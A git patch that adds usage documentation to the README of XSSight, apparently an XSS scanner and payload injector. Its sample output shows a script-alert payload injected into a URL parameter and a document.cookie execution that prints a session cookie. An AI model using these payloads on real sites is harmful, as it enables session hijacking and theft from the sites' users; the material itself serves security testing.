From bbb4da44e2588aa6d27619ebab1c8c29a0823bc8 Mon Sep 17 00:00:00 2001
From: UltimateHackers <s0md3v@gmail.com>
Date: Thu, 13 Apr 2017 16:05:41 +0530
Subject: [PATCH] Update README.md

---
 README.md | 80 ++++++++++++++++++++++++++++++++++++++++++++++++++++++-
 1 file changed, 79 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 764b78f..e303294 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,80 @@
 # XSSight
-It is script that can scan for XSS vulnerabilites and inject payloads.
+
+XSSight is an XSS Scanner and Payload Injector.
+
+## Usages
+
+##### Scanning for payload
+
+```
+root@kali:~# python /root/XSSight/xssight.py
+	    .-'^`\                                        /`^'-.
+	  .'   ___\                                      /___   `.
+	 /    /.---.                                    .---.\    `
+	|    //     '-.  ___________________________ .-'     \    |
+	|   ;|         \/--------------------------//         |;   |
+	\   ||       |\_)          XSSight         (_/|       ||   /
+	 \  | \  . \ ;  |     By Team Ultimate     || ; / .  / |  /
+	  '\_\ \ \ \ \ |                          ||/ / / // /_/'
+	        \ \ \ \|       Beta Release       |/ / / //
+	         `'-\_\_\     teamultimate.in     /_/_/-'`
+	                '--------------------------' 
+ These types of URLs are accepted
+ Example: http://www.dwebsite.com/ 
+ Example: http://www.website.com= 
+ Example: http://www.website.com? 
+
+ Enter target url: teamultimate.in/test.php?q=1
+ 
+------------------------------
+Select an operation:
+------------------------------
+ 1. XSS Scanner
+ 2. Payload Injector
+ Enter your choice [1-2] : 1
+------------------------------
+Date: Thu, 13 Apr 2017 10:29:37 GMT
+Server: Apache/2.2.3 (CentOS)
+Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Set-Cookie: PHPSESSID=uuoseraa5aeaqct5urq2bfu766; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Pragma: no-cache
+Vary: Accept-Encoding,User-Agent
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+* scanning GET parameter 'q'
+ (i) GET parameter 'q' appears to be XSS vulnerable ("<script>.'.xss.'.</script>", enclosed by <script> tags, inside single-quotes, no filtering)
+ ```
+ ##### Injecting payload
+ ```
+ ------------------------------
+Select an operation:
+------------------------------
+ 1. XSS Scanner
+ 2. Payload Injector
+ Enter your choice [1-2] : 2
+------------------------------
+Date: Thu, 13 Apr 2017 10:32:58 GMT
+Server: Apache/2.2.3 (CentOS)
+Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Set-Cookie: PHPSESSID=hrk67m70t3dn9u27626d5n4fi7; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Pragma: no-cache
+Vary: Accept-Encoding,User-Agent
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+[+] Injecting payloads in the parameter: http://teamultimate.in/search.php?q=d
+ Testing: http://teamultimate.ink/search.php?q=d%22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E
+ Source Length: 56048
+ WAF Not Found
+
+[!] XSS: http://teamultimate.in/test.php?q=d%22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E 
+
+[+] Confirmed Payload Found in Web Page Code
+Excuting document.cookie
+==> <Cookie PHPSESSID=vj8o3b8ohmf18rco6fvm5uads5 for teamultimate.in/>
+
+
+```